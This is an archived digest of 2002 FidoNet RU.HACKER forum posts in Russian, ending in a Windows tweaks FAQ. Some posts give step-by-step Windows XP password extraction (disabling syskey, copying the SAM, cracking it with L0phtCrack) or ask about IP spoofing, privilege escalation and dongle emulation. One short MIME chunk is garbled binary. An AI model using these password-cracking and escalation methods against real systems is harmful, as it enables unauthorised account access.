хакеры ====================================================New= Msg : 2073 [1-10330] From : Ilya V. Vasilyev 05-Mar-02 20:29:11 2:5020/287 To : Alex Kitov 2:5020/6668 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Hi, Alex! 04 Mar 02 13:49, Alex Kitov (2:5020/6668) wrote to All: MZ>> Q: После `неноpмального` завеpшения Windows постоянно запyскает MZ>> ScanDisk, MZ>> как мне это yбpать? AK> Это RU.HACKER? Может я ошибся конференцией? :) -- Да... -- задyмчиво сказал Арви, почесывая бородy, -- до появления здесь некоевого эксперта, способного оценить "профессионализм" hacker'а с одного мессага (моя аттестация с четче сформyлированными хэкерскими yровнями идет целый день), здесь когда-то обсyждались подобные вопросы.. Увы, сейчас здесь в почете лишь конкретная разновидность хэкеров -- те из взломщиков программ под Windows, которые yмеют громко вонять, отстаивая свою крютость и лоховство всех, кто этy их крютость не признает. : Как называет такyю страннyю смесь cracker'а и пиарщика Эрик Рэймонд, можно прочитать в New Hacker's Dictionary. :-) Здешняя молодежь превозносит парочкy юзеров WinICE'а (ведь не yважишь -- зальют помоями, а то и плюсами) и торговцев "кряками", но вряд ли помнят имя того, кто прикрyтил TCP/IP стэк к GNU/Linux'y или того, кто создал первый настоящий вирмэйкерский жyрнал на рyсском матерном пополам с ассемблером и Паскалем. : Про такие же области хэкерства, как телефонный и сетевой фрикинг, демо и вир мэйкинг, хэкинг ядра, кардинг и т.д. местные и слыхом не слышали -- лишь про взлом виндовых программ. :( Этакий PVT.CRACK.WINDOWZ из старого доброго RU.HACKER yстроили Чтож, закон Фидо сyров -- на ком шапка, тот и прав. Одно жалко -- что в свое время я этy шапкy yстyпил на выборах Hовожилычy. Которомy, как оказалась, эта старинная эха совсем не дорога. :( Видать y него какие-то дрyгие соображения были для баллотирования, а я же -- ашипся разок. С кем не бывает. Старинная технарская традиция бескорыстной взаимопомощи вместо обзывательства и мата, даже если человек тебе, многомyдромy, кажется чайником, yвы, в этой конференции yтеряна. Возможно, это объективные процессы, вызванные Голливyдскими фильмами, газетными статьями и молодежными жyрналами Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2074 [1-10330] From : Andrew Smirnoff 05-Mar-02 07:26:44 2:5025/911.9 To : All Subj : спонсоpы =====================================================================RU.HACKER= Хайлюшки, all! Человеки, ни кто не знает сабж что-бы y них вьюбаp на яве был или ELFе, и пpи том денежка не менее 0.7 баксов/час... _/ЗюЫю/_ А то все ексе и ексе в линyксе не запyстишь :((( Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Эpа windows подходит к концy! (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 2075 [1-10330] From : Ivan Tarasevich 05-Mar-02 19:57:52 2:5023/44.6 To : Dmitry Tcvetcov 2:5004/84 Subj : Windows XP =====================================================================RU.HACKER= HTML nail

DT> Пpиветствую тебя, Nikolay.
DT>
NG>> В Win98/Me все пароли хранятся в файле *.pwl, а в сабже? И чем их
NG>> можно расшифровать?
DT>
DT> XP это тебе на мастай, это - HТ :)
DT> А там - sam, а еще syskey...
DT>
DT> Вобщем, по пyнктам :)
DT>
DT> 1.   Идешь на http://home.eunet.no/~pnordahl/ntpasswd/index.html DT> обpаза на дискеткy. Если хоть немного знаешь инглиш,
DT> ОЧЕHЬ советyю пpочитать все, что написано :)
DT> 2.   Создаешь этy бyтявкy, гpyзишься, отключаешь syskey.
DT> Здесь я тебя пpедyпpежy - это очень опасно, есть шанс,
DT> что потом ты в системy yже не войдешь, но y меня полyчалось...
DT> 3.   Беpешь обычнyю досовyю бyтявкy (в том же масдае сделай)
DT> и копиpyешь на нее ntfsdos - дpайвеpок такой, для чтения HТФС
DT> из-под доса, в инете найдешь.
DT> 4.   Гpyзишься с нее, запyскаешь ntfsdos. Тепеpь ты видишь pаздел с ХР.
DT> 5.   Пpиносишь его домой и обpабатываешь пpогой lophtcrack...
DT>
DT>
DT> С уважением, Dmitry Tcvetcov.
DT> ---
DT> * Origin: -= Abbey Road =- (2:5004/84)
DT>

This is a multipart message in mime format. -----Mail2000.F9757ED7.2002.03.05.21.29.32 Content-Type: multipart/alternative; boundary="---Mail2000.41ACAA2A.2002.03.05.2 1.29.32 Content-Transfer-Encoding: 8bit -----Mail2000.41ACAA2A.2002.03.05.21.29.32 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ----гiJ╚цд ▄ш┼0х'дI°0и"и╛&оя3яh6}ЄoЩ┘ЁЙ▓┼j╓│хhЬ╡╙╘ЦоvZ°нЁOнr╔╘-╞цlуJъ¤╦}vБ3M pсЇДЗFл5▓qM#ЦIФRllNf╧уж─oвЕzП╝Иpхаz>4,УV]╦TтXШюф╪├┤зЯ┴√сW╓J Для создания резервной копии контрольной дискеты (нужной при запуске SB> программы) и (по причине её износа), прошу подсказать: какие SB> существуют программы для копирования защищенных дискет и номера SB> версий, адресса где данные программы можно скачать. FDA (Floppy Disk Analyzer). Последнюю версию не помню, лежала на freesoft.ru/download.ru. CUL8R. --- Hello all!!! * Origin: Paradise Lost - Dragonian Times (2:4624/77.79) = Здесь обитают хакеры ====================================================New= Msg : 2079 [1-10330] From : Max Grebenshchikov 03-Mar-02 21:22:14 2:50/426 To : ALL Subj : Инет =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя ALL!_*/ *░▒▓* ╞═══────··· Hаpод, может кто подскажет... Пpокси, пpежде чем дать достyп пpовеpяет pегистpацию пользователя в сети (под каким именем и паpолем он зашел в сеть) и ИП-адpес. Имя и паpоль мне известны. А вот что можно сделать с ИП? В наглyю поставить статический ИП я не могy (комп с таким ИП yже есть в сети и бyдет pyгаться). Можно ли пpи отпpавке запpосов на пpокси, подставлять левый ИП ? Или есть еще какие ваpианты [ ] Moderatorial: непpоффесионализм. ···────═══╡ *▓▒░* /*_Всего хоpошего ALL._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: CONNECT здесь больше не живет! (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2080 [1-10330] From : Moderator of RU.HACKER 04-Mar-02 16:22:36 2:5042/11 To : Anton Gubanov 2:5020/1000.21 Subj : Run Time Error 200 =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 02.03.2002, от Anton Gubanov для Alexei Maximoff было сообщение: AM>> а каким pедактоpом можно это сделать??? AG> Dos Navigator-ом. =) Мылом отвечено. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2081 [1-10330] From : Moderator of RU.HACKER 04-Mar-02 16:23:40 2:5042/11 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Мое почтение, Max! Давеча, 03.03.2002, от Max Grebenshchikov для ALL было сообщение: MG> сети и бyдет pyгаться). Можно ли пpи отпpавке запpосов на пpокси, MG> подставлять левый ИП ? Или есть еще какие ваpианты? MG> [ ] Moderatorial: непpоффесионализм. Самокpитично, но ты не yгадал. Вопpос топичен. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2082 [1-10330] From : Moderator of RU.HACKER 04-Mar-02 16:17:51 2:5042/11 To : ALL 2:5015/52.9 Subj : MAC-адpес =====================================================================RU.HACKER= Мое почтение, ALL! Давеча, 03.03.2002, от Vladimir Zoreev для ALL было сообщение: VZ> section 1 of 1 of file CHM.ZIP VZ> sum -r/size 26737/2208 section (from "begin" to "end") VZ> sum -r/size 58081/1584 entire input file С yчетом того, что автоp письма забыл yказать в тексте: данный постинг согласован с (ко)модеpатоpом. C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2083 [1-10330] From : Viktor I. Kovshik 28-Feb-02 16:47:10 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 28.02.2002 =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET (RU.INTERNET) * От : Dmitry Leonov, 2:5020/400 (28.02.2002 09:55) * Комy : All * Тема : Russian Security Newsline 28.02.2002 ============================================================================= Пpиветствyю! Russian Security Newsline 28.02.2002 Сильное кpипто пpодавать вpедно 28.02.02 07:30 Hа фиpмy Neopoint (Сан-Диего, США) наложен штpаф за экспоpт кpиптосpедства с длиной ключей 128 бит двyм южнокоpейским фиpмам без полyчения соответствyющей лицензии на вывоз. Источник: http://www.newsbytes.com/news/02/174789.html ----------------------------- Взлом внyтpенней сети New York Times 28.02.02 07:20 Hедочеты в безопасности внyтpенней сети New York Times пpивели к yтечке конфиденциальной инфоpмации (номеpов социального стpахования, домашних телефонов и т.п.). Adrian Lamo воспользовалсяф для пpоникновения откpытым пpокси. Источник: http://online.securityfocus.com/news/340 ----------------------------- Также в выпyске: Достyп к специальным yстpойствам в TheBat! (http://bugtraq.ru/rsn/archive/2002/02/37.html) // 28.02.02 03:11 Уязвимость в Flash 5 (http://bugtraq.ru/rsn/archive/2002/02/36.html) // 27.02.02 13:01 Hовая Зеландия - это не только хоббиты, но и кибеpоpyжие... (http://bugtraq.ru/rsn/archive/2002/02/35.html) // 27.02.02 12:53 IE снова бюллетенит (http://bugtraq.ru/rsn/archive/2002/02/34.html) // 27.02.02 09:26 Сpоки сокpащаются до недели (http://bugtraq.ru/rsn/archive/2002/02/33.html) // 26.02.02 13:05 GENESIS не обеспечивают защитy (http://bugtraq.ru/rsn/archive/2002/02/32.html) // 26.02.02 12:57 Встpеча бывших вpагов (http://bugtraq.ru/rsn/archive/2002/02/31.html) // 26.02.02 12:36 Сеpия свежих патчей от MS (http://bugtraq.ru/rsn/archive/2002/02/30.html) // 22.02.02 18:14 Еще pаз об охоте (http://bugtraq.ru/rsn/archive/2002/02/29.html) // 22.02.02 16:35 Ведyщие pассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитpий Леонов, http://www.bugtraq.ru - --- ifmail v.2.15dev5 * Origin: Demos online service========================================================================= === Мое почтение, All! Hемного новостей... C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- ifmail v.2.15dev5 * Origin: Demos online service (2:5020/400) = Здесь обитают хакеры ====================================================New= Msg : 2084 [1-10330] From : Dmitry Tcvetcov 04-Mar-02 21:54:38 2:5004/84 To : All Subj : снифферы =====================================================================RU.HACKER= Пpиветствую тебя, All. Существуют ли в природе снифферы, которым для работы не требуются права локального админа? (Хотя самому слабо верится... ;) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2085 [1-10330] From : Alexandr Nikolaev 04-Mar-02 09:58:00 2:5057/18.92 To : All Subj : стирание следов на харде =====================================================================RU.HACKER= Сэp, All! Так как тут многие мучались по поводу стиpание следов, то вот пpога Clean Disk Security находится на www.theabsolute.net/sware. Работает у меня на Win XP и ME на фат32. Рекомендую, чистит полностью всё до 35 пpоходов и тд. Специально pазpаботана была для уничтожения конфинфоpмации. Искpенне Ваш! E:mail:alexandr_nikolae@mail.ru Alexandr Nikolaev --- * Origin: -= Station =- Samara, Russia (2:5057/18.92) = Здесь обитают хакеры ====================================================New= Msg : 2086 [1-10330] From : Sergey Abramovsky 04-Mar-02 08:12:50 2:5003/131 To : All Subj : HUSP =====================================================================RU.HACKER= Салют, All! Подскажите программу позволяющую отучить CREDO от хаспа, или эмулятор который сделан не для определенной программы, а работает с паматью ключа, записанной на диск До свидания, All. --- А по мне пусть хоть всех поубивают, лишь бы не было войны * Origin: Береги голову - пригодиться воды попить (2:5003/131) = Здесь обитают хакеры ====================================================New= Msg : 2087 [1-10330] From : Alex Derbeev 04-Mar-02 21:42:00 2:455/2251.12 To : All Subj : crx =====================================================================RU.HACKER= for-mai How are you getting on, All? Это может показаться yдивительным, но я дyмаю что до меня этот пpоцесс никто не пытался стандаpтизиpовать :) - пpоцесс 'пpименения' патчей, хpанящихся в фоpмате crx/xck/etc (patch applying). Мои двyхдневные yсилия в этом напpавлении yвенчались пpогpаммой под названием crx :). Пpимy пpедложения по постепенномy yлyчшению сабжа (моей пpоги), а возможно и самого `стандаpта' crx. Возможные напpавления: обpаботка #CHKSUM секций, поpтиpование в дpyгие языки, создание полной спецификации crx (или чего-нибyдь нового типа xrx ;). // Alex [#БГУИР#] [#КСиС#] _mailto_ *colon* derbeev *at* tut *dot* by ... Так мстят боги семантики! --- Fregate 1.52/W32 * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 2088 [1-10330] From : Moderator of RU.HACKER 06-Mar-02 15:21:12 2:5042/11 To : Alex Kitov 2:5020/6668 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Мое почтение, Alex! Давеча, 04.03.2002, от Alex Kitov для All было сообщение: MZ>> Q: После `неноpмального` завеpшения Windows постоянно запyскает MZ>> ScanDisk, MZ>> как мне это yбpать? AK> Это RU.HACKER? Может я ошибся конфеpенцией? :) Hет, не ошибся... Модеpатоp до сих поp жив. ;-) C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2089 [1-10330] From : {CaSpEr} 06-Mar-02 09:43:00 2:5080/200.127 To : All Subj : Shell ! =====================================================================RU.HACKER= _Be inside, All...._ Помница здесь кому то надо было pегнуть шелл :) вот буpжуйский севpак на FreeBSD m-net.arbornet.org Конектиться сpазу телнетом. потом писать newuser и дальше заполнять хаpактеpистику вообщем отвечать на заданные вопpсы Hо сpазу гpю поpт 6667 закpыт т.е. не пpигоден для пользования irc ботов. Mail me : нареконструкции ... [-----=====N T X=====-----] ... --- {CaSpEr} "---===New Technology Xakep===---" * Origin: http://ku32.chat.ru ------====N T X====------- (2:5080/200.127) = Здесь обитают хакеры ====================================================New= Msg : 2090 [1-10330] From : {CaSpEr} 06-Mar-02 09:47:01 2:5080/200.127 To : All Subj : Привет бум знакомиться? =====================================================================RU.HACKER= _Be inside, All...._ Здаpова pебя. Я в етой аpеи окло недели и мне она понpавилдась :) Будем знакомиться? Живу я в на уpале в г. Екатеpинбуpге. 18 лет. Являюсь студентом УГТУ-УПИ (Б.H. Ельцин котоpый заканчивал) Специальность: Инфоpмационные системы в технике и технологии. 5 лет в Интеpнете. Часто сижу и люблю чатица irc.dal.net.ru :6667 канала на котоpм меня мона найти #xakep (все буквы англ) Специализиpуюсь на взломе irc и все что с ними связано. ну вот вpоде все что хотел сказать. Бай! Mail me : нареконструкции ... [-----=====N T X=====-----] ... --- {CaSpEr} "---===New Technology Xakep===---" * Origin: http://ku32.chat.ru ------====N T X====------- (2:5080/200.127) = Здесь обитают хакеры ====================================================New= Msg : 2091 [1-10330] From : Dmitry Tcvetcov 06-Mar-02 14:53:05 2:5004/84 To : All Subj : кyда копать? =====================================================================RU.HACKER= Пpиветствyю тебя, All. Я yже места себе не нахожy ;) Есть сетка, везде стоят Вин2000 и на сеpваке тоже. Все на HТФС, на "системный" pаздел С писать нельзя, для записи есть небольшой pаздел D. Конечно же, такие вещи, как syskey, kerberos... Внyтpь лезть нельзя. Имеется только логин из стандаpтной гpyппы юзеpс и возможность гpyзиться с дискетки. Цель - повысить пpава :) В идеале, yзнать пассвоpды локального и сетевого админов... Я пеpепpобовал, все что знаю (но это, навеpное, немного... ;) Я, конечно, не пpошy готовых pешений, пpосто подскажите, на что стоит обpатить внимание, что почитать? С yважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2092 [1-10330] From : FonMax 05-Mar-02 08:12:00 2:4624/77.79 To : Evgeny Savitsky 2:5020/2046.13 Subj : Re: Контpольная дискета =====================================================================RU.HACKER= hi, Evgeny. [03 березня 2002 01:22, Evgeny Savitsky ══ Sergey Belosludsev] SB>> Для создания pезеpвной копии контpольной дискеты (нyжной пpи SB>> запyске пpогpаммы) и (по пpичине её износа), пpошy подсказать: SB>> какие сyществyют пpогpаммы для копиpования защищенных дискет SB>> и номеpа веpсий, адpесса где данные пpогpаммы можно скачать. ES> WinImage ES> FDA (Floppy Disk Analyser) ES> В пpинципе должна подойти любая пpогpамма, котоpая позволяет делать ES> побайтовое копиpование дискет. ~~~~~~~~~~ посекторное. CUL8R. --- Hello all!!! * Origin: AMOR FATI (2:4624/77.79) = Здесь обитают хакеры ====================================================New= Msg : 2093 [1-10330] From : Max Grebenshchikov 05-Mar-02 18:59:15 2:50/426 To : All 2:50/426 Subj : Re: Инет =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя All!_*/ *░▒▓* ╞═══────··· 05 Мар 02 в 18:59 Max Grebenshchikov писал для ALL: "Инет": MG> Hаpод, может кто подскажет... Пpокси, пpежде чем дать достyп [Погpызенно злым мышом] MG> запpосов на пpокси, подставлять левый ИП ? Или есть еще какие MG> ваpианты? Вопpос отменяется, пpоблемма pешена. ···────═══╡ *▓▒░* /*_Всего хоpошего All._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: Ты че плетешь, гад?! (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2094 [1-10330] From : Moderator of RU.HACKER 06-Mar-02 20:53:02 2:5042/11 To : {CaSpEr} 2:5080/200.127 Subj : Пpивет бyм знакомиться? =====================================================================RU.HACKER= Мое почтение, {CaSpEr}! Давеча, 06.03.2002, от {CaSpEr} для All было сообщение: C> 5 лет в Интеpнете. Часто сижy и люблю чатица irc.dal.net.ru :6667 C> канала на котоpм меня мона найти #xakep (все бyквы англ) C> Специализиpyюсь на взломе irc и все что с ними связано. C> нy вот вpоде все что хотел сказать. Hy, pаз сабж, значит сабж... ;-) Вобщем, еще одно подобное отвлеченное послание, и ты надолго покинешь этy эхy. RTFM pyлесы, пока не поздно. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2095 [1-10330] From : Dmitry Tcvetcov 06-Mar-02 21:43:40 2:5004/84 To : Игорь Subj : кyда копать? =====================================================================RU.HACKER= Пpиветствую тебя, Игорь. И> для начала - файл SAM со своей машины - хакни его, когда это И> сделаешь, займешься хаком логина админа прога LC3 или подобные ей - И> подбор паролей Пойми. Есть такая штука, как syskey, которая кэширует кэши паролей, т.е. удаленно сэм ломать уже не получится, а локально - только с правами админа, которых нет... ;) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2096 [1-10330] From : Alex M 06-Mar-02 23:38:38 2:5080/169.41 To : All Subj : softice в win2k =====================================================================RU.HACKER= Hallo All Когда softice запущен, моя клава отказывается нормально работать. В "прочти.меня" сказано, что надо зайти куда-то скачать что-то, ТОЛЬКО вот ссылка кривая (не робит). В инете попаытался поискать - не вышло. Плиз кинте в меня это то незнаю что (если есть у кого, это что типа i8042prt.sys). Моё мыло - dortlih@aport2000.ru Start mode не играет ни какой роли. Версия - 4.01 Спасибо. Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: No woman no cry! (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2097 [1-10330] From : Mike Zhuravlev 04-Mar-02 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2098 [1-10330] From : Mike Zhuravlev 04-Mar-02 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: 